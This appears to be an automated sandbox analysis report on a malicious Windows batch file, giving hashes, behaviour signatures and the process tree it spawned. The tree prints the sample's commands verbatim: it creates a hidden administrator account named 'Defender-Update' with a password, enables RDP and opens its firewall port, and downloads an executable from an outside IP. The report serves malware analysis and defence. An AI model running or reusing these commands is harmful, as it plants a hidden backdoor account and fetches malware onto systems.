Analysis

  • max time kernel
    156s
  • max time network
    171s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230915-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system
  • submitted
    11-10-2023 20:31

General

  • Target

    klink24.bat

  • Size

    1KB

  • MD5

    81b71168a37befd2646587909efa050b

  • SHA1

    965a0db15b5cf77ea3c285d4f49d41b92a3d364d

  • SHA256

    d51b466d9bd852e4b463096b9a922fe9e06e75e1258d274b576103498e578c01

  • SHA512

    55e5a056d70b6799600c28d084593cdbde2eab836b33024d458f00971f03a87a076b760ee6b21913523996d20b695bc7f024eb59e46c03aa253708e5fd62339b

Score
9/10

Malware Config

Signatures

  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • Blocklisted process makes network request 1 IoCs
  • Modifies Windows Firewall 1 TTPs 1 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 30 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\klink24.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:232
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c wmic Group Where "SID = 'S-1-5-32-544'" Get Name /Value | Find "="
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4984
      • C:\Windows\System32\Wbem\WMIC.exe
        wmic Group Where "SID = 'S-1-5-32-544'" Get Name /Value
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:3736
      • C:\Windows\system32\find.exe
        Find "="
        3⤵
          PID:2860
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c wmic Group Where "SID = 'S-1-5-32-555'" Get Name /Value | Find "="
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2208
        • C:\Windows\System32\Wbem\WMIC.exe
          wmic Group Where "SID = 'S-1-5-32-555'" Get Name /Value
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:3856
        • C:\Windows\system32\find.exe
          Find "="
          3⤵
            PID:4644
        • C:\Windows\system32\net.exe
          net user Defender-Update defen2!AW7W21 /add /expires:never
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:612
          • C:\Windows\system32\net1.exe
            C:\Windows\system32\net1 user Defender-Update defen2!AW7W21 /add /expires:never
            3⤵
              PID:1500
          • C:\Windows\system32\net.exe
            net localgroup Administrators Defender-Update /ADD
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:3296
            • C:\Windows\system32\net1.exe
              C:\Windows\system32\net1 localgroup Administrators Defender-Update /ADD
              3⤵
                PID:1288
            • C:\Windows\system32\net.exe
              net localgroup "Remote Desktop Users" Defender-Update /ADD
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:4072
            • C:\Windows\system32\reg.exe
              reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
              2⤵
                PID:5016
              • C:\Windows\system32\netsh.exe
                netsh advfirewall firewall add rule name="allow RDP" dir=in protocol=TCP localport=3389 action=allow
                2⤵
                • Modifies Windows Firewall
                PID:4012
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell iwr http://78.47.123.155:8233/klink.exe -OutFile c:\programdata\klink.exe
                2⤵
                • Blocklisted process makes network request
                • Suspicious behavior: EnumeratesProcesses
                PID:3884
            • C:\Windows\system32\net1.exe
              C:\Windows\system32\net1 localgroup "Remote Desktop Users" Defender-Update /ADD
              1⤵
                PID:3860

              Network

              MITRE ATT&CK Enterprise v15

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vuhq2o3i.gvm.ps1

                Filesize

                60B

                MD5

                d17fe0a3f47be24a6453e9ef58c94641

                SHA1

                6ab83620379fc69f80c0242105ddffd7d98d5d9d

                SHA256

                96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                SHA512

                5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

              • memory/3884-9-0x000001E82CDD0000-0x000001E82CDF2000-memory.dmp

                Filesize

                136KB

              • memory/3884-10-0x00007FFA1EAA0000-0x00007FFA1F561000-memory.dmp

                Filesize

                10.8MB

              • memory/3884-11-0x000001E82CC60000-0x000001E82CC70000-memory.dmp

                Filesize

                64KB

              • memory/3884-12-0x000001E82CC60000-0x000001E82CC70000-memory.dmp

                Filesize

                64KB

              • memory/3884-13-0x000001E82CC60000-0x000001E82CC70000-memory.dmp

                Filesize

                64KB

              • memory/3884-14-0x00007FFA1EAA0000-0x00007FFA1F561000-memory.dmp

                Filesize

                10.8MB

              • memory/3884-15-0x000001E82CC60000-0x000001E82CC70000-memory.dmp

                Filesize

                64KB

              • memory/3884-16-0x000001E82CC60000-0x000001E82CC70000-memory.dmp

                Filesize

                64KB

              • memory/3884-17-0x000001E82CC60000-0x000001E82CC70000-memory.dmp

                Filesize

                64KB

              • memory/3884-20-0x00007FFA1EAA0000-0x00007FFA1F561000-memory.dmp

                Filesize

                10.8MB